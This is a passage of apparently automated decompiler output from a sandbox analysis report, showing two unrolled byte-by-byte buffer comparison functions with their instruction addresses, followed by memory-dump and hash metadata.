						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































              0x00d90548
              0x00d90548
              0x00d9054e
              0x00d905d6
              0x00d905d8
              0x00d905da
              0x00000000
              0x00000000
              0x00d905e0
              0x00d905e6
              0x00d9066d
              0x00d9066f
              0x00d90671
              0x00000000
              0x00000000
              0x00d90677
              0x00d9067d
              0x00d90704
              0x00d90706
              0x00d90708
              0x00000000
              0x00000000
              0x00d9070e
              0x00d90714
              0x00d9079b
              0x00d9079d
              0x00d9079f
              0x00000000
              0x00000000
              0x00d907ab
              0x00d90833
              0x00d90835
              0x00d90837
              0x00000000
              0x00000000
              0x00d9083d
              0x00d90843
              0x00d908ca
              0x00d908cc
              0x00d908ce
              0x00000000
              0x00000000
              0x00d908d4
              0x00d908da
              0x00d90961
              0x00d90963
              0x00d90965
              0x00000000
              0x00000000
              0x00d90973
              0x00d90975
              0x00d9098d
              0x00d90995
              0x00d90997
              0x00d900f0
              0x00d900f8
              0x00d900fa
              0x00d90107
              0x00d90107
              0x00000000
              0x00d900fa
              0x00d909a4
              0x00d900ea
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d900ea
              0x00d9097e
              0x00d90987
              0x00000000
              0x00000000
              0x00000000
              0x00d90987
              0x00d908e7
              0x00d908e9
              0x00d90901
              0x00d90909
              0x00d9090b
              0x00d90923
              0x00d9092b
              0x00d9092d
              0x00d90945
              0x00d9094d
              0x00d9094f
              0x00d90958
              0x00d90958
              0x00000000
              0x00d9094f
              0x00d90936
              0x00d9093f
              0x00000000
              0x00000000
              0x00000000
              0x00d9093f
              0x00d90914
              0x00d9091d
              0x00000000
              0x00000000
              0x00000000
              0x00d9091d
              0x00d908f2
              0x00d908fb
              0x00000000
              0x00000000
              0x00000000
              0x00d908fb
              0x00d90850
              0x00d90852
              0x00d9086a
              0x00d90872
              0x00d90874
              0x00d9088c
              0x00d90894
              0x00d90896
              0x00d908ae
              0x00d908b6
              0x00d908b8
              0x00d908c1
              0x00d908c1
              0x00000000
              0x00d908b8
              0x00d9089f
              0x00d908a8
              0x00000000
              0x00000000
              0x00000000
              0x00d908a8
              0x00d9087d
              0x00d90886
              0x00000000
              0x00000000
              0x00000000
              0x00d90886
              0x00d9085b
              0x00d90864
              0x00000000
              0x00000000
              0x00000000
              0x00d90864
              0x00d907b9
              0x00d907bb
              0x00d907d3
              0x00d907db
              0x00d907dd
              0x00d907f5
              0x00d907fd
              0x00d907ff
              0x00d90817
              0x00d9081f
              0x00d90821
              0x00d9082a
              0x00d9082a
              0x00000000
              0x00d90821
              0x00d90808
              0x00d90811
              0x00000000
              0x00000000
              0x00000000
              0x00d90811
              0x00d907e6
              0x00d907ef
              0x00000000
              0x00000000
              0x00000000
              0x00d907ef
              0x00d907c4
              0x00d907cd
              0x00000000
              0x00000000
              0x00000000
              0x00d907cd
              0x00d90721
              0x00d90723
              0x00d9073b
              0x00d90743
              0x00d90745
              0x00d9075d
              0x00d90765
              0x00d90767
              0x00d9077f
              0x00d90787
              0x00d90789
              0x00d90792
              0x00d90792
              0x00000000
              0x00d90789
              0x00d90770
              0x00d90779
              0x00000000
              0x00000000
              0x00000000
              0x00d90779
              0x00d9074e
              0x00d90757
              0x00000000
              0x00000000
              0x00000000
              0x00d90757
              0x00d9072c
              0x00d90735
              0x00000000
              0x00000000
              0x00000000
              0x00d90735
              0x00d9068a
              0x00d9068c
              0x00d906a4
              0x00d906ac
              0x00d906ae
              0x00d906c6
              0x00d906ce
              0x00d906d0
              0x00d906e8
              0x00d906f0
              0x00d906f2
              0x00d906fb
              0x00d906fb
              0x00000000
              0x00d906f2
              0x00d906d9
              0x00d906e2
              0x00000000
              0x00000000
              0x00000000
              0x00d906e2
              0x00d906b7
              0x00d906c0
              0x00000000
              0x00000000
              0x00000000
              0x00d906c0
              0x00d90695
              0x00d9069e
              0x00000000
              0x00000000
              0x00000000
              0x00d9069e
              0x00d905f3
              0x00d905f5
              0x00d9060d
              0x00d90615
              0x00d90617
              0x00d9062f
              0x00d90637
              0x00d90639
              0x00d90651
              0x00d90659
              0x00d9065b
              0x00d90664
              0x00d90664
              0x00000000
              0x00d9065b
              0x00d90642
              0x00d9064b
              0x00000000
              0x00000000
              0x00000000
              0x00d9064b
              0x00d90620
              0x00d90629
              0x00000000
              0x00000000
              0x00000000
              0x00d90629
              0x00d905fe
              0x00d90607
              0x00000000
              0x00000000
              0x00000000
              0x00d90554
              0x00d90558
              0x00d9055c
              0x00d9055e
              0x00d90576
              0x00d90576
              0x00d9057e
              0x00d90580
              0x00d90598
              0x00d90598
              0x00d905a0
              0x00d905a2
              0x00d905ba
              0x00d905ba
              0x00d905c2
              0x00d905c4
              0x00d905cd
              0x00d905cd
              0x00000000
              0x00d905c4
              0x00d905a8
              0x00d905ab
              0x00d905b4
              0x00000000
              0x00000000
              0x00000000
              0x00d905b4
              0x00d90586
              0x00d90589
              0x00d90592
              0x00000000
              0x00000000
              0x00000000
              0x00d90592
              0x00d90564
              0x00d90567
              0x00d90570
              0x00000000
              0x00000000
              0x00000000
              0x00d90570
              0x00d8fcd6
              0x00d8fcd6
              0x00d90ac7

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction ID: 19aeae93f8a30d1a71a592eef7df35d9103cd67f152af290cfc9991feea29b75
              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction Fuzzy Hash: DEC193722051970EDF6D573A957413EBEA16EA27B131E076DE8B2CB0C5FE20D624E630
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8FCDE, Relevance: .3, Instructions: 331COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D8FCDE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























              0x00d8fcde
              0x00d8fcde
              0x00d8fce4
              0x00d8fd5b
              0x00d8fd5d
              0x00d8fd5f
              0x00000000
              0x00000000
              0x00d8fd65
              0x00d8fd6b
              0x00d8fdf2
              0x00d8fdf4
              0x00d8fdf6
              0x00000000
              0x00000000
              0x00d8fdfc
              0x00d8fe02
              0x00d8fe89
              0x00d8fe8b
              0x00d8fe8d
              0x00000000
              0x00000000
              0x00d8fe93
              0x00d8fe99
              0x00d8ff20
              0x00d8ff22
              0x00d8ff24
              0x00000000
              0x00000000
              0x00d8ff2a
              0x00d8ff30
              0x00d8ffb7
              0x00d8ffb9
              0x00d8ffbb
              0x00000000
              0x00000000
              0x00d8ffc7
              0x00d9004f
              0x00d90051
              0x00d90053
              0x00000000
              0x00000000
              0x00d90059
              0x00d9005f
              0x00d900e6
              0x00d900e8
              0x00d900ea
              0x00d900f8
              0x00d900fa
              0x00d90107
              0x00d90107
              0x00d900fa
              0x00000000
              0x00d900ea
              0x00d9006c
              0x00d9006e
              0x00d90086
              0x00d9008e
              0x00d90090
              0x00d900a8
              0x00d900b0
              0x00d900b2
              0x00d900ca
              0x00d900d2
              0x00d900d4
              0x00d900dd
              0x00d900dd
              0x00000000
              0x00d900d4
              0x00d900bb
              0x00d900c4
              0x00000000
              0x00000000
              0x00000000
              0x00d900c4
              0x00d90099
              0x00d900a2
              0x00000000
              0x00000000
              0x00000000
              0x00d900a2
              0x00d90077
              0x00d90080
              0x00000000
              0x00000000
              0x00000000
              0x00d90080
              0x00d8ffd5
              0x00d8ffd7
              0x00d8ffef
              0x00d8fff7
              0x00d8fff9
              0x00d90011
              0x00d90019
              0x00d9001b
              0x00d90033
              0x00d9003b
              0x00d9003d
              0x00d90046
              0x00d90046
              0x00000000
              0x00d9003d
              0x00d90024
              0x00d9002d
              0x00000000
              0x00000000
              0x00000000
              0x00d9002d
              0x00d90002
              0x00d9000b
              0x00000000
              0x00000000
              0x00000000
              0x00d9000b
              0x00d8ffe0
              0x00d8ffe9
              0x00000000
              0x00000000
              0x00000000
              0x00d8ffe9
              0x00d8ff3d
              0x00d8ff3f
              0x00d8ff57
              0x00d8ff5f
              0x00d8ff61
              0x00d8ff79
              0x00d8ff81
              0x00d8ff83
              0x00d8ff9b
              0x00d8ffa3
              0x00d8ffa5
              0x00d8ffae
              0x00d8ffae
              0x00000000
              0x00d8ffa5
              0x00d8ff8c
              0x00d8ff95
              0x00000000
              0x00000000
              0x00000000
              0x00d8ff95
              0x00d8ff6a
              0x00d8ff73
              0x00000000
              0x00000000
              0x00000000
              0x00d8ff73
              0x00d8ff48
              0x00d8ff51
              0x00000000
              0x00000000
              0x00000000
              0x00d8ff51
              0x00d8fea6
              0x00d8fea8
              0x00d8fec0
              0x00d8fec8
              0x00d8feca
              0x00d8fee2
              0x00d8feea
              0x00d8feec
              0x00d8ff04
              0x00d8ff0c
              0x00d8ff0e
              0x00d8ff17
              0x00d8ff17
              0x00000000
              0x00d8ff0e
              0x00d8fef5
              0x00d8fefe
              0x00000000
              0x00000000
              0x00000000
              0x00d8fefe
              0x00d8fed3
              0x00d8fedc
              0x00000000
              0x00000000
              0x00000000
              0x00d8fedc
              0x00d8feb1
              0x00d8feba
              0x00000000
              0x00000000
              0x00000000
              0x00d8feba
              0x00d8fe0f
              0x00d8fe11
              0x00d8fe29
              0x00d8fe31
              0x00d8fe33
              0x00d8fe4b
              0x00d8fe53
              0x00d8fe55
              0x00d8fe6d
              0x00d8fe75
              0x00d8fe77
              0x00d8fe80
              0x00d8fe80
              0x00000000
              0x00d8fe77
              0x00d8fe5e
              0x00d8fe67
              0x00000000
              0x00000000
              0x00000000
              0x00d8fe67
              0x00d8fe3c
              0x00d8fe45
              0x00000000
              0x00000000
              0x00000000
              0x00d8fe45
              0x00d8fe1a
              0x00d8fe23
              0x00000000
              0x00000000
              0x00000000
              0x00d8fe23
              0x00d8fd78
              0x00d8fd7a
              0x00d8fd92
              0x00d8fd9a
              0x00d8fd9c
              0x00d8fdb4
              0x00d8fdbc
              0x00d8fdbe
              0x00d8fdd6
              0x00d8fdde
              0x00d8fde0
              0x00d8fde9
              0x00d8fde9
              0x00000000
              0x00d8fde0
              0x00d8fdc7
              0x00d8fdd0
              0x00000000
              0x00000000
              0x00000000
              0x00d8fdd0
              0x00d8fda5
              0x00d8fdae
              0x00000000
              0x00000000
              0x00000000
              0x00d8fdae
              0x00d8fd83
              0x00d8fd8c
              0x00000000
              0x00000000
              0x00000000
              0x00d8fce6
              0x00d8fce6
              0x00d8fced
              0x00d8fcef
              0x00d8fd03
              0x00d8fd03
              0x00d8fd0b
              0x00d8fd0d
              0x00d8fd21
              0x00d8fd21
              0x00d8fd29
              0x00d8fd2b
              0x00d8fd3f
              0x00d8fd3f
              0x00d8fd47
              0x00d8fd49
              0x00d8fd52
              0x00d8fd52
              0x00000000
              0x00d8fd49
              0x00d8fd31
